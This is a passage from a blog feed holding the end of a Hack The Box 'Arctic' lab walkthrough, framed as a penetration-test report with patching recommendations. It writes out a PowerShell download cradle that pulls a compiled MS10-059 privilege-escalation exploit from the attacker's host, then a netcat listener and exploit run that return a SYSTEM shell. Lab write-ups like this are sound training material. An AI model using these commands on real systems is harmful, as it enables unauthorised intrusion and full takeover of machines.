srcset="https://substackcdn.com/image/fetch/$s_!R8wr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 424w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 848w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 1272w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!R8wr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/b9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!R8wr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 424w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 848w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 1272w, https://substackcdn.com/image/fetch/$s_!R8wr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9f34e9b-f5d6-4f3e-86ba-bf47ae55396d_800x266.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>A quick search on GitHub, find <a href="https://github.com/egre55/windows-kernel-exploits">this</a>, with the executable already compiled (work smarter, not harder).</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oPm2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oPm2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 424w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 848w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 1272w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oPm2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oPm2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 424w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 848w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 1272w, https://substackcdn.com/image/fetch/$s_!oPm2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F45666406-d59e-4fa4-a36e-ce4bb386ce66_800x469.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s copy this down (I copied into the /opt directory) via:</p><p><em>cd /opt<br>git clone <a href="https://github.com/egre55/windows-kernel-exploits">https://github.com/egre55/windows-kernel-exploits</a><br>cd windows-kernel-exploits/MS10&#8211;059: Chimichurri/Compiled<br>cp Chimichurri.exe ~/Documents/HTB/arctic/</em></p><p>Now, we need to get the file on Arctic. I tried in the directory we start in, but to no avail, so I moved up 2 levels to C:\ColdFusion8. Now we have to great a makeshift wget.</p><p><em>echo $webclient = New-Object System.Net.WebClient &gt;wget.ps1<br>echo $url = &#8220;http://10.10.14.xx/Chimichurri.exe&#8221; &gt;&gt;wget.ps1<br>echo $file = &#8220;Chimichurri.exe&#8221; &gt;&gt;wget.ps1<br>echo $webclient.DownloadFile($url,$file) &gt;&gt;wget.ps1</em></p><p>To execute this, standup another SimpleHTTPServer on port 80 (<em>pythom -m SimpleHTTPServer 80</em>) then we enter:</p><p><em>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1</em></p><p>Voila!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TpEB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TpEB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 424w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 848w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 1272w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TpEB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e5c49687-186e-40de-a89b-411d027465ad_800x414.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TpEB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 424w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 848w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 1272w, https://substackcdn.com/image/fetch/$s_!TpEB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5c49687-186e-40de-a89b-411d027465ad_800x414.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Next, we setup another netcat listener on Port 443. <em>nc -nlvp 443 </em>then execute <em>Chimichurri.exe 10.10.14.xx 443</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vEXZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vEXZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 424w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 848w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 1272w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vEXZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vEXZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 424w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 848w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 1272w, https://substackcdn.com/image/fetch/$s_!vEXZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8c6a015-a175-49d7-92e4-20d7a809cf25_800x403.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Bazinga! Now, lets move to the Administrator&#8217;s Desktop for the Flag!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0p5p!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0p5p!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 424w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 848w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 1272w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0p5p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0p5p!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 424w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 848w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 1272w, https://substackcdn.com/image/fetch/$s_!0p5p!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F18fcc183-5123-4297-8962-dcaf2e736be1_755x475.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Whew, we&#8217;re done.</p><h3>Findings, Sample Code, and Flags</h3><p>Finding 1: The ColdFusion8 server is out of date and allowed the adversary to perform directory traversal to obtain the admin password to CF8.</p><p>Finding 2: Upon logging in, the adversary was able to upload a Java reverse shell to the adversary&#8217;s system allowing them low-level access. Upon taking the contents of <em><strong>systeminfo</strong></em> to the adversary&#8217;s system, they were able to identify several vulnerabilities due to the unpatched system.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ybSZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ybSZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 424w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 848w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 1272w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ybSZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ybSZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 424w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 848w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 1272w, https://substackcdn.com/image/fetch/$s_!ybSZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9e994ad-e6a5-49e3-b9a2-6f85dd979127_800x663.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Finding 3: After gaining access to the system, the adversary was able to use Powershell to move a compiled executable to the victim system and escalate privileges.</p><p>Finding 4: The privilege escalation was successful and the adversary gained the root.txt flag. From here, the adversary had full system access and could have installed Command and Control Infrastructure or used the system for other nefarious purposes such as Business Email Compromise, Cryptomining, or Phishing.</p><h3>Additional Actions</h3><p>None.</p><h3>High-Level Summary and Recommendations</h3><p>C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Arctic (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using out of date software (its predecessor was released in 2009), the adversary was able to enter a malformed web address (URL) to gain the admin password.</p><p>From here, the adversary was able to log in and set up a scheduled task that allowed the adversary to gain a connection outside of ColdFusion to the system which allowed the adversary to determine that this system (which is also beyond End of Life (EOL)) had never been patched and find existing code on the internet to get Administrative permissions and effectively take the system completely over.</p><p>The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems. Furthermore, it is recommended that all software, particularly public-facing web servers use the latest stable release of available software.</p><p>Specific upgrades recommended are Microsoft Windows Server 2016 or 2019 and ColdFusion 2018 (which may require the web application to be rebuilt).</p><h3>Tools Used</h3><p>nmap<br>dirb<br>msfvenom<br>SearchSploit<br><a href="https://crackstation.net/">Crackstation.net</a><br>MS10&#8211;059: Chimichurri<br>netcat<br>Python SimpleHTTPServer<br>Windows Exploit Suggester</p><p>Other Walktroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-blue-7fe9eb09d15">Blue</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-lame-5cf414d1c523">Lame</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-legacy-147bbcc9ff02">Legacy</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-mirai-83b22174f03b">Mirai</a></p>]]></content:encoded></item><item><title><![CDATA[Announcing Hack the Box Writeups]]></title><description><![CDATA[As many of you know, I am actively working on my Offensive Security Certified Professional (OSCP) and have unsuccessfully attempted the&#8230;]]></description><link>https://tidbit.theosintion.com/p/announcing-hack-the-box-writeups-7bba859e1fb8</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/announcing-hack-the-box-writeups-7bba859e1fb8</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Mon, 26 Aug 2019 01:58:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Je98!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Je98!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Je98!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0f5731a8-a806-49fc-8b68-d0d200c78942_800x450.jpeg 424w, 